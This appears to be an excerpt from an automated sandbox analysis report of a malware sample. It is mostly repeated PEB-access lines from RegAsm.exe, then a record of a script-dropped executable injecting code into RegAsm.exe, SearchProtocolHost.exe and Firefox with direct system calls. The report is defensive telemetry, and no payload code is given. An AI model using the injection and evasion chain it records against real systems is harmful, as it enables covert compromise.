                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F116CF mov eax, dword ptr fs:[00000030h]3_2_02F116CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F166B0 mov eax, dword ptr fs:[00000030h]3_2_02F166B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD6AA mov eax, dword ptr fs:[00000030h]3_2_02EDD6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD6AA mov eax, dword ptr fs:[00000030h]3_2_02EDD6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1C6A6 mov eax, dword ptr fs:[00000030h]3_2_02F1C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED76B2 mov eax, dword ptr fs:[00000030h]3_2_02ED76B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED76B2 mov eax, dword ptr fs:[00000030h]3_2_02ED76B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED76B2 mov eax, dword ptr fs:[00000030h]3_2_02ED76B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6368C mov eax, dword ptr fs:[00000030h]3_2_02F6368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6368C mov eax, dword ptr fs:[00000030h]3_2_02F6368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6368C mov eax, dword ptr fs:[00000030h]3_2_02F6368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6368C mov eax, dword ptr fs:[00000030h]3_2_02F6368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE4690 mov eax, dword ptr fs:[00000030h]3_2_02EE4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE4690 mov eax, dword ptr fs:[00000030h]3_2_02EE4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F12674 mov eax, dword ptr fs:[00000030h]3_2_02F12674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A660 mov eax, dword ptr fs:[00000030h]3_2_02F1A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A660 mov eax, dword ptr fs:[00000030h]3_2_02F1A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F19660 mov eax, dword ptr fs:[00000030h]3_2_02F19660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F19660 mov eax, dword ptr fs:[00000030h]3_2_02F19660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA866E mov eax, dword ptr fs:[00000030h]3_2_02FA866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA866E mov eax, dword ptr fs:[00000030h]3_2_02FA866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFC640 mov eax, dword ptr fs:[00000030h]3_2_02EFC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE262C mov eax, dword ptr fs:[00000030h]3_2_02EE262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE627 mov eax, dword ptr fs:[00000030h]3_2_02EFE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF626 mov eax, dword ptr fs:[00000030h]3_2_02EDF626
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5636 mov eax, dword ptr fs:[00000030h]3_2_02FB5636
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F16620 mov eax, dword ptr fs:[00000030h]3_2_02F16620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F18620 mov eax, dword ptr fs:[00000030h]3_2_02F18620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22619 mov eax, dword ptr fs:[00000030h]3_2_02F22619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1F603 mov eax, dword ptr fs:[00000030h]3_2_02F1F603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F11607 mov eax, dword ptr fs:[00000030h]3_2_02F11607
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE3616 mov eax, dword ptr fs:[00000030h]3_2_02EE3616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE3616 mov eax, dword ptr fs:[00000030h]3_2_02EE3616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E609 mov eax, dword ptr fs:[00000030h]3_2_02F5E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EED7E0 mov ecx, dword ptr fs:[00000030h]3_2_02EED7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE47FB mov eax, dword ptr fs:[00000030h]3_2_02EE47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE47FB mov eax, dword ptr fs:[00000030h]3_2_02EE47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F027ED mov eax, dword ptr fs:[00000030h]3_2_02F027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F027ED mov eax, dword ptr fs:[00000030h]3_2_02F027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F027ED mov eax, dword ptr fs:[00000030h]3_2_02F027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEC7C0 mov eax, dword ptr fs:[00000030h]3_2_02EEC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE57C0 mov eax, dword ptr fs:[00000030h]3_2_02EE57C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE57C0 mov eax, dword ptr fs:[00000030h]3_2_02EE57C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE57C0 mov eax, dword ptr fs:[00000030h]3_2_02EE57C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F607C3 mov eax, dword ptr fs:[00000030h]3_2_02F607C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0D7B0 mov eax, dword ptr fs:[00000030h]3_2_02F0D7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE07AF mov eax, dword ptr fs:[00000030h]3_2_02EE07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB37B6 mov eax, dword ptr fs:[00000030h]3_2_02FB37B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF7BA mov eax, dword ptr fs:[00000030h]3_2_02EDF7BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6F7AF mov eax, dword ptr fs:[00000030h]3_2_02F6F7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6F7AF mov eax, dword ptr fs:[00000030h]3_2_02F6F7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6F7AF mov eax, dword ptr fs:[00000030h]3_2_02F6F7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6F7AF mov eax, dword ptr fs:[00000030h]3_2_02F6F7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6F7AF mov eax, dword ptr fs:[00000030h]3_2_02F6F7AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F697A9 mov eax, dword ptr fs:[00000030h]3_2_02F697A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F78A mov eax, dword ptr fs:[00000030h]3_2_02F9F78A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB765 mov eax, dword ptr fs:[00000030h]3_2_02EDB765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB765 mov eax, dword ptr fs:[00000030h]3_2_02EDB765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB765 mov eax, dword ptr fs:[00000030h]3_2_02EDB765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB765 mov eax, dword ptr fs:[00000030h]3_2_02EDB765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE8770 mov eax, dword ptr fs:[00000030h]3_2_02EE8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0770 mov eax, dword ptr fs:[00000030h]3_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22750 mov eax, dword ptr fs:[00000030h]3_2_02F22750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22750 mov eax, dword ptr fs:[00000030h]3_2_02F22750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F64755 mov eax, dword ptr fs:[00000030h]3_2_02F64755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF3740 mov eax, dword ptr fs:[00000030h]3_2_02EF3740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF3740 mov eax, dword ptr fs:[00000030h]3_2_02EF3740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF3740 mov eax, dword ptr fs:[00000030h]3_2_02EF3740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB3749 mov eax, dword ptr fs:[00000030h]3_2_02FB3749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1674D mov esi, dword ptr fs:[00000030h]3_2_02F1674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1674D mov eax, dword ptr fs:[00000030h]3_2_02F1674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1674D mov eax, dword ptr fs:[00000030h]3_2_02F1674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE0750 mov eax, dword ptr fs:[00000030h]3_2_02EE0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5C730 mov eax, dword ptr fs:[00000030h]3_2_02F5C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F15734 mov eax, dword ptr fs:[00000030h]3_2_02F15734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBB73C mov eax, dword ptr fs:[00000030h]3_2_02FBB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBB73C mov eax, dword ptr fs:[00000030h]3_2_02FBB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBB73C mov eax, dword ptr fs:[00000030h]3_2_02FBB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBB73C mov eax, dword ptr fs:[00000030h]3_2_02FBB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1273C mov eax, dword ptr fs:[00000030h]3_2_02F1273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1273C mov ecx, dword ptr fs:[00000030h]3_2_02F1273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1273C mov eax, dword ptr fs:[00000030h]3_2_02F1273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE3720 mov eax, dword ptr fs:[00000030h]3_2_02EE3720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFF720 mov eax, dword ptr fs:[00000030h]3_2_02EFF720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFF720 mov eax, dword ptr fs:[00000030h]3_2_02EFF720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFF720 mov eax, dword ptr fs:[00000030h]3_2_02EFF720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1C720 mov eax, dword ptr fs:[00000030h]3_2_02F1C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1C720 mov eax, dword ptr fs:[00000030h]3_2_02F1C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA972B mov eax, dword ptr fs:[00000030h]3_2_02FA972B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE973A mov eax, dword ptr fs:[00000030h]3_2_02EE973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE973A mov eax, dword ptr fs:[00000030h]3_2_02EE973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F72E mov eax, dword ptr fs:[00000030h]3_2_02F9F72E
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeFile created: temp_u8gpg.exe.0.drJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtUnmapViewOfSection: Direct from: 0x76F12D3CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
